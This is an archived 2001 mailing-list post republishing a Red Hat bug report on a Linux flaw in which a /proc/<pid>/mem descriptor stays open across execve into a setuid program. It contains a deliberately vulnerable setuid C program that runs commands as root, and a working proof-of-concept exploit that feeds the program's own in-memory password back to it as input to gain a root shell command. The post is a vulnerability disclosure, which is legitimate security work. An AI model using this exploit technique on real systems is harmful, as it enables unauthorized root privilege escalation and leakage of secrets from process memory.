Posted to bugzilla.redhat.com: Tue, 15 May 2001 06:43:27 -0400 This was then made unaccessable, and I've seen nothing that looks like a fix yet. A month and a half seems like long enough to work it out. Contents of https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=40658 as posted before the page was made accessible, with a slight fix. It is possible (under certain circumstances) to read from /proc/$$/mem by close()ing fd 0, and open()ing it with /proc/<curpid>/mem. after opening to it, lseek()ing to the memory offset in the process you want to read from will cause the program to receive as input the text at that position when it read()s from fd 0. (eg: the /proc/<curpid>/mem file handle remains open through the execve() and the setuid process will have permission to read from it.) This doesn't seem to be very secure behaviour. (Not sure how to fix it, but is possible to exploit a seemingly secure, although badly written, program with this method.) The sample program simulates a password program. The correct password is a 16 character sequence read from /dev/random, however anything could be substituted, as long as it is in memory before the read is done, and is in the same form as the input it is to be compared with. This method could also be used to discover any data a program has in memory, as long as it is usually possible to somehow retrieve the information you typed outside the program. /********************************************** ** vuln-prog.c - chown root:root, chmod u+s ** **********************************************/ char *password, *input; main(int argc,char*argv[]) { int fd,count; if(0>(fd=open("/dev/urandom",0)))exit(1);//check for resource starvation password=(char*)malloc(17); read(fd,password,16); if(close(fd))exit(1); password[16]=0; input=(char*)malloc(17); for(count=0;count<16;count++)input[count]=getchar(); input[count]=0; for(count=0;count<16;count++)if(input[count]!=password[count])exit(1); setreuid(0,0); execl("/bin/bash","sh","-c",argv[1],0); } EOF exploit:- /* spew.c */ #include <stdio.h> /* to get the address, ltrace a copy of the program as a normal user, or brute force it over the expected range. */ #define WHERETOREAD [the address malloced for password by vuln-prog] // use ltrace on a non setuid copy of the program, or bruteforce it. main() { char y[1000]; FILE *f; int p; p=getpid(); sprintf(y,"/proc/%d/mem",p); close(0); f=fopen(y,"r"); fseek(f,WHERETOREAD,SEEK_SET); execl("/tmp/vuln-prog","scary","/tmp/myscript",0); } EOF -- zen-parse
This archive was generated by hypermail 2b30 : Wed Jun 27 2001 - 14:06:03 PDT